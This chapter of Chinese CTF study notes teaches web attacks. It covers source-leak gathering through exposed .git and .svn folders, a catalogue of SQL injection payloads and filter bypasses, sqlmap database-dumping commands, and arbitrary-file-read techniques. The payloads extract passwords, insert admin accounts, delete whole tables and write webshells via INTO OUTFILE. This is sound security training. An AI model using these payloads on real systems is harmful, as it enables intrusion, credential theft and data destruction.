\chapter{web入门}
web类题目是CTF比赛的主要题目，和二进制、逆向题目相比，不需要掌握底层知识。本章介绍web题目最常见的三类漏洞。


\section{信息收集}
信息搜集涵盖的面很广泛，包含备份文件、目录信息、Banner信息等，信息搜集主要依赖经验。


\subsection{敏感目录泄露}

\subsubsection*{git泄露}

\paragraph*{常规git泄露}
直接用现成工具或脚本获取网站源码或flag。如：在确保目标URL含有.git的情况下，可以直接使用\href{https://github.com/denny0223/scrabble}{scrabble}来获取网站源码。命令如下：
\begin{lstlisting}
./scrabble http://example.com/
\end{lstlisting}

\paragraph*{git回滚}
利用scrabble获取网站源码后，部分情况下，flag会在之前的commit中被删除/修改，这时需要回滚。
\begin{lstlisting}
git reset --hard HEAD^ #回滚到上一版本
git log -stat #查看每个commit修改了什么
git diff HEAD commit-id #查看当前版本与目标版本的区别
\end{lstlisting}

\paragraph*{git分支}
有时候flag不在默认分支中，需要切换其他分支，但大部分现成git泄露工具不支持分支，还原其他分支代码需要手工进行文件提取。功能较强的工具有\href{https://github.com/WangYihang/GitHacker}{GitHacker}，用法：
\begin{lstlisting}
python GitHacker.py [Website]
\end{lstlisting}
而后使用$git\ reflog$命令查看checkout记录，可以发现其他分支，然后修改/复用GitHacker代码来自动恢复分支。

\paragraph*{git泄露其他利用}
泄露的git中可能还有其他有用信息，比如说.git/config文件夹里面可能有access\_tocken信息，用来访问用户其他仓库。

\subsubsection*{SVN泄露}
SVN是源代码版本管理软件，管理员可能疏忽将SVN隐藏文件夹暴露在外。可以利用.svn/entries或wc.db获取服务器源码。

工具：https://github.com/kost/dvcs-ripper/,Seay-svn(windows)。


\subsubsection*{HG泄露}
HG会创建.hg隐藏文件记录代码、分支信息。

工具：https://github.com/kost/dvcs-ripper/

\subsubsection*{总结经验}

CTF线上赛往往有重定向问题，如访问.git后重定向，再访问.git/config后有内容返回，就有.git泄露问题。

目录扫描工具：https://github.com/maurosoria/dirsearch

\subsection{敏感备份文件}

\subsubsection*{gedit备份文件}
gedit：文件保存后会有一个后缀为'$\sim$'的文件。如$flag\sim$。

\subsubsection*{vim备份文件}
vim崩溃时会有一个$.swp$文件，可以用$vim\ -r$命令恢复。

\subsubsection*{常规文件}
\begin{itemize}
    \item robots.txt:CMS版本信息
    \item readme
    \item www.zip/rar/tar.gz: 常常是网站的备份源码
\end{itemize}


\subsection{Banner识别}
Banner:网站服务器对外显示的一些基础信息，如网站使用的框架等。可以据此尝试框架历史漏洞。

\subsubsection*{自行搜集指纹库}
github上有CMS指纹库，也有扫描器。

\subsubsection*{使用已有工具}
Wappalyzer工具：python工具，使用pip安装即可。

\subsubsection*{总结经验}
随意输入一些URL有时可以通过404或302跳转页面发现一些信息。


\section{SQL注入}
\subsection{SQL注入基础}
介绍数字型注入、UNION注入、字符型注入、布尔型注入、时间注入、报错注入和堆叠注入。

\subsubsection*{数字型注入和UNION注入}
数字型注入：注入点为数字。
\begin{itemize}
    \item 判断方法：注入$3-1$之类的计算式来判断是否是数字型注入。
    \item 利用方法：结合UNION语句进行联合查询注入。
\end{itemize}
联合查询时需要知道表名，mysql有自带数据库$information\_schema$，里面包含了所有的数据库名、表名、字段名：
\begin{lstlisting}
UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()
UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_name='NAME'
\end{lstlisting}
$ group\_concat $是将多行查询结果以逗号分隔放在一行的函数。

注意：UNION查询时，后面查询的列数要和前面查询语句查询的列数一样，所以需要用'UNION SELECT 1,2,3,...,n'的方法首先确定列数。

\subsubsection*{字符型注入和布尔盲注}
字符型注入：数字注入点外部包裹了引号。
\begin{itemize}
    \item 判断方法：输入字符'a'，看查询结果和0是否一致。因为a会被强制转换为0。
    \item 利用方法：用引号闭合前面的语句，最后面用'\#'或者'-- '注释后面的部分。
    \item 注意用URL编码，'\#'为'\%23'，' '为'\%20'，单引号为'\%27'，双引号为'\%22'。
\end{itemize}
之后操作和数字型一致。

布尔盲注：看不到查询结果时，通过在查询语句中添加判断式、观察回显页面来推测数据。
\begin{itemize}
    \item 判断方法：存在字符型注入或字符型注入但又看不到查询结果，只能通过回显页面判断结果是否存在。
    \item 利用方法：后面添加判断式，逐字符猜测结果。
    \item 常用函数：substring(str,start,len)，mid(str,start,len),substr(str,start,len)。
\end{itemize}
例子：
\begin{lstlisting}
SELECT title,content FROM wp_news WHERE id='1' AND (SELECT MID((SELECT concat(user,0x7e,pwd) FROM wp_user),1,1)) = 'a'
\end{lstlisting}
'0x7e'是波浪号。

时间盲注：查询成功和查询失败的回显页面没有任何区别，这时可以通过IF或OR、AND语句，加入sleep函数，通过观察执行时间来判断。

\subsubsection*{报错注入}
报错注入：目标网站开启了错误调试信息，报错信息会回显到网页上。如：
\begin{lstlisting}
SELECT ... FROM ... WHERE ... OR VAR_DUMP(mysqli_error($\$$conn))
\end{lstlisting}
\begin{itemize}
    \item 判断方法：输入语法错误语句，看是否有报错语句回显。
    \item 利用方法：利用updatexml()第二个参数的特性，其第二个参数不是合法的XPATH路径时，会输出传入的参数。
\end{itemize}
例子：
\begin{lstlisting}
SELECT title,content FROM wp_news WHERE id='1' OR updatexml(1,concat(0x7e,(select pwd from wp_user)),1)
\end{lstlisting}

堆叠注入：目标开启了多语句执行，可以一次注入多行命令，任意修改表和数据库。

\subsection{注入点}
从SQL语法角度讲注入技巧。

\subsubsection*{SELECT注入}
\paragraph*{注入点在select\_expr}
源码形式: 
\begin{lstlisting}
SELECT $\$${_GET['id']}, content FROM wp_news
\end{lstlisting}
且页面只会显示结果中的'title','content'列。
注入方法：时间盲注或AS别名。
\begin{lstlisting}
别名: id = (SELECT pwd FROM wp_user) AS title
\end{lstlisting}

\paragraph*{注入点在table\_reference}
源码形式: 
\begin{lstlisting}
SELECT title FROM $\$${_GET['table']}
\end{lstlisting}
且页面只会显示结果中的'title','content'列。
注入方法：AS别名。
\begin{lstlisting}
别名: table = (SELECT pwd AS title FROM wp_user)
\end{lstlisting}

\paragraph*{注入点在WHERE或HAVING后}
源码形式：
\begin{lstlisting}
SELECT title FROM wp_news WHERE id=$\$${_GET['id']}
\end{lstlisting}
最常见的，和上一节的方法一样，注意判断和闭合引号和括号。

\paragraph*{注入点在GROUP\ BY或ORDER\ BY后}
源码形式：
\begin{lstlisting}
SELECT title FROM wp_news GROUP BY $\$${_GET['title']}
\end{lstlisting}
判断和注入：判断下列语句是否有效，而后时间盲注。
\begin{lstlisting}
title = id desc,(if(1,sleep(1),1))
\end{lstlisting}

\paragraph*{注入点在LIMIT后}
LIMIT后只能是数字，在语句没有ORDER\ BY关键字时，可以用UNION注入。MYSQL5.6前的版本可以用PROCEDURE注入,这个语句可以获取版本号：
\begin{lstlisting}
SELECT id FROM wp_news LIMIT 2 PROCEDURE analyse(extractvalue(1,concat(0x3a,version())),1)
\end{lstlisting}
'0x3a'是':'，处理时会报错，错误回显会显示version()。
没有错误回显时，也可以基于时间注入获取版本号：
\begin{lstlisting}
PROCEDURE analyse((SELECT extractvalue(1,concat(0x3a,(IF(MID(VERSION(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1))))))),1)
# BENCHMARK处理时间大概为1s。
\end{lstlisting}
确定版本在5.6之前后，可以用INTO\ OUTFILE语句直接向web目录写入webshell。
没有写文件权限时，可以用如下语句控制部分内容:
\begin{lstlisting}
SELECT xxxx INTO outfile "/tmp/xxx.php" LINES TERMINATED BY '<?php phpinfo;?>'
\end{lstlisting}

\subsubsection*{INSERT注入}
\paragraph*{注入点位于tbl\_name}
源码形式:
\begin{lstlisting}
INSERT INTO $\$${_GET['table']} VALUES(2,2,2,2)
\end{lstlisting}
注入方法：可以注释后面语句的情况下，可以直接向任意表格插入数据。
\begin{lstlisting}
table=wp_user values(2,'new_admin','new_password')#
\end{lstlisting}

\paragraph*{注入点位于VALUES}
源码形式:
\begin{lstlisting}
INSERT INTO wp_user VALUES(1,1,'$\$${_GET['value']}')
\end{lstlisting}
注入方法：闭合单引号后另行插入一个values。
\begin{lstlisting}
value=1',values(2,1,'aaa')
value=1',values(2,1,(SELECT pwd FROM wp_user LIMIT 1)) #能回显部分字段情况下直接查询
\end{lstlisting}

\subsubsection*{UPDATE注入}
源码形式：
\begin{lstlisting}
UPDATE wp_user SET id=$\$${_GET['id']} WHERE user='x'
\end{lstlisting}
注入方法：可以修改多字段，或使用与SELECT语句类似的方法。
\begin{lstlisting}
id=1,user='y'
\end{lstlisting}

\subsubsection*{DELETE注入}
源码形式：
\begin{lstlisting}
DELETE FROM wp_news WHERE id=$\$${_GET['id']}
\end{lstlisting}
注入方法：可以直接删除整个表，也可以通过sleep防止表被删后进行时间盲注:
\begin{lstlisting}
id=1 or 1   #删除所有
id=1 and sleep(1)   #sleep会返回0
\end{lstlisting}


\subsection{注入和防御}

\subsubsection*{字符替换}
防御方法：直接替换关键字。

\paragraph*{只替换空格}
防御者直接替换空格为空。
攻击方法：用"\%0a,\%0b,\%0c,\%09,\%a0"和/**/组合、括号等替代空格。

\paragraph*{将SELECT替换为空}
防御者直接替换SELECT为空。
攻击方法：嵌套，使用SESELECTLECT。

\paragraph*{大小写匹配}
防御者替换select或SELECT。
攻击方法：使用sElEcT。

\paragraph*{正则匹配}
匹配语句:"$\backslash$bselect$\backslash$b"。
攻击方法：可以用"/*!5000select*/"绕过。

\paragraph*{过滤引号，但没过滤反斜杠}
源码形式：
\begin{lstlisting}
SELECT * FROM wp_news WHERE id='可控点1' AND title='可控点2'
\end{lstlisting}
攻击方法：使用反斜杠转义可控点1后面的单引号，使可控点2逃逸。
\begin{lstlisting}
可控点1：a\
可控点2：or sleep(1) #
\end{lstlisting}

\subsubsection*{逃逸引号}
开发者常常对用户输入做addslashes，添加反斜杠转义引号等。

\paragraph*{编码解码}
若开发者使用了urldecode、base64\_decode等解码函数，则将引号编码后输入。

\paragraph*{意料之外的输入点}
PHP中上传的文件名、http\ header、$\$$\_SERVER['PHP\_SELF']。

\paragraph*{二次注入}
开发者通常信任数据库中取出的数据。
攻击者可以设置用户名为admin'or'1，用户名在转义后可以顺利存入数据库。当用户名被再次使用时：
\begin{lstlisting}
SELECT password from wp_user WHERE username='admin'or'1'
\end{lstlisting}

\paragraph*{字符串阶段}
开发者可能限定长度。
源码形式：
\begin{lstlisting}
SELECT * FROM wp_news WHERE id='可控点1' AND title='可控点2'
\end{lstlisting}
其中限制了可控点1的长度为10且添加了addslashes转义可控点1中的反斜杠、引号。
攻击方法：
\begin{lstlisting}
可控点1=aaaaaaaaa'
\end{lstlisting}
这时可控点1会被转义为aaaaaaaaa$\backslash$',正好'被截断，最后一位是$\backslash$，从而使可控点2逃逸。

\subsection{注入的功效}
\begin{itemize}
    \item 文件读写。INTO\ OUTFILE、DUMPFILE、load\_file()。
    \item 提权。添加权限、添加用户。
    \item 文件读取。
    \item 数据库控制。
    \item SQL\ SERVER中系统命令执行。
\end{itemize}

\subsection{sqlmap}
使用\href{https://github.com/sqlmapproject/sqlmap}{sqlmap}可以直接注入。若注入点在参数中，可以直接:
\begin{lstlisting}
python sqlmap.py http://target.com?id=1
sql选项:
./sqlmap.py -u "注入地址" --dbs // 列举数据库
./sqlmap.py -u "注入地址" --current-db // 当前数据库
./sqlmap.py -u "注入地址" --users // 列数据库用户
./sqlmap.py -u "注入地址" --current-user // 当前用户
./sqlmap.py -u "注入地址" --tables -D "数据库" // 列举数据库的表名
./sqlmap.py -u "注入地址" --columns -T "表名" -D "数据库" // 获取表的列名
./sqlmap.py -u "注入地址" --dump -C "字段,字段" -T "表名" -D "数据库" // 获取表中的数据，包含列，就是脱裤
\end{lstlisting}
若注入点在POST请求中，可以用burp抓包后把请求包保存下来，然后直接:
\begin{lstlisting}
python sqlmap.py -r "post.txt" -p [ArgName] --[option]
\end{lstlisting}

\section{任意文件读取}
文件读取漏洞是指，攻击者通过手段读取服务器上不允许读取的文件。文件漏洞广泛存在的原因主要是:
\begin{itemize}
    \item web开发中轮子用得太多，开发者没有仔细了解应用框架、中间件的安全机制就直接使用。
    \item Web Server自身的问题或不安全的服务器配置。Web Server运行基本机制是从服务器读取代码和资源文件给解释器或CGI程序执行，然后把结果反馈给用户，中间涉及众多文件操作都可能被攻击者干预。
\end{itemize}

\subsection{文件读取漏洞常见触发点}
\subsubsection*{Web语言}
\paragraph*{PHP}
PHP中有关读文件的函数包括但不限于:file\_get\_contents()、file()、fopen()、fgets()、fread()等，与文件包含相关函数include()、require()、include\_once()、require\_once()等，以及通过PHP读文件的执行系统命令system()、exec()等。这些函数常见且危险。
由于PHP开发技术越来越倾向于单入口、多层级、多通道模式，其中涉及PHP文件之间的调用密集且频繁。一个高复用性的文件调用函数需要将动态信息传入，程序入口处如果没有对这些动态输入数据加以控制，攻击者就很容易注入恶意路径，实现任意文件读取甚至任意文件包含。
除PHP标准库函数外，PHP扩展也包含很多可以读取文件的函数，例如php-curl扩展、XML模块造成的XXE等。
\begin{itemize}
    \item Wrapper:PHP向用户提供的指定打开文件的方式不是路径，而是文件流，可以理解为\textbf{PHP提供的协议}，如通过'http://host:port/xxx'就通过HTTP请求服务器上对应的文件，PHP中还有很多功能不同的类似协议，统称为\textbf{Wrapper}。其中最具特色的协议是'php://协议'，PHP还提供了接口供开发者编写自定义的:\\'wrapper(stream\_wrapper\_register)'。
    \item Filter: Filter的作用是对目前的Wrapper进行处理，如将文件流内容变为全大写。这给我们进行任意文件读取带来了便利。
\end{itemize}
PHP文件包含问题中，可能遇到三种情况:
\begin{itemize}
    \item 文件路径前面可控，后面不可控:较低版本的PHP和容器版本中使用'$\backslash x00$'(URL编码为'\%00')截断。存在文件上传功能时尝试利用zip或phar协议进行文件包含进而执行PHP代码。
    \item 文件路径后面可控，前面不可控:可以通过'../'进行目录穿越来直接读取文件，但是这种情况用不了Wrapper。如果服务端利用include等文件包含类函数，我们就无法读取PHP文件中的PHP代码。
    \item 文件路径中间可控:和第一种类似，但无法进行文件包含。
\end{itemize}

\paragraph*{Python}
Python的Web应用倾向于通过自身模块启动服务，搭配中间件、代理服务将web应用呈现给用户。用户和web应用交互过程保安对服务器资源文件的请求，因此容易出现非预期的读取文件。漏洞经常出现在框架请求静态资源文件部分。
如os.path.join('/a','/b')结果为'/b'，开发者往往只会过滤'.'。python主要漏洞点:
\begin{itemize}
    \item 滥用open函数、模板的不当渲染导致任意文件读取。如不安全的解压模块可能导致目录穿越，覆盖已有文件。
    \item 攻击者构造软连接放入压缩包，解压后的内容指向服务器响应文件，通过访问软连接访问服务器相应文件。
    \item python的模板注入、反序列化等漏洞都可能导致任意文件读取。
\end{itemize}

\paragraph*{Java}
除了Java本身FileInputStream、XXE以外，Java一些模块支持'file://'协议，这里任意文件读取出现得最多。

\paragraph*{Ruby}
Ruby的任意文件读取漏洞通常与Rails框架相关。
\paragraph*{Node}
Node.js的express模块曾存在任意文件读取漏洞。

\subsubsection*{中间件/服务器相关}
\paragraph*{Nginx错误配置}
如:
\begin{lstlisting}
location /static {
    alias /home/myapp/static/;
}
\end{lstlisting}
攻击者请求路径为'/static../'时，就会解析为'/home/myapp/static/../'，漏洞成因是location最后没有用'/'限制，如果是'/static/'就不存在这个漏洞。

\paragraph*{数据库}
主要是load\_file函数进行文件读取，有一些严格的限制:
\begin{itemize}
    \item 需要数据库配置FILE权限，root用户一般都有。
    \item 执行load\_file函数的mysql用户对目标文件有可读权限。
    \item 主流Linux系统需要Aparmor配置了目录白名单。
\end{itemize}
还有通过直接执行整体SQL语句进行文件读取的方法，'load data infile'，需要FILE权限，且很少有机会可以执行整条SQL语句。

\paragraph*{软链接}
用'ln -s'命令在本地创建软链接，传到服务器，向服务器请求这个软链接时，实际请求的是它指向的文件。

\paragraph*{其他}
\begin{itemize}
    \item FFmpeg曾曝出任意文件读取漏洞。
    \item Dokcer-API可以控制Docker行为，一般通过Unix Socket或HTTP通信，可以通过SSRF漏洞进行Unix Socket通信时，就可以通过操纵Dokcer-API把本地文件载入Docker新容器进行读取(利用ADD/COPY操作)。
\end{itemize}

\subsubsection*{客户端相关}
\paragraph*{浏览器/Flash\ XSS}
Javascript中可以使用File协议、结合浏览器同源策略漏洞读取客户本地文件。

\paragraph*{MarkDown语法解析器XSS}
Markdown解析器也有解析JavaScript的能力，且大多没有对本地文件读取操作进行限制。

\subsection{文件读取漏洞常见读取路径}
主要是flag加各种后缀名和linux中'/etc'目录下的各种配置文件，'/proc'目录，其他配置目录等。做题时再进行查阅或者用工具暴力遍历。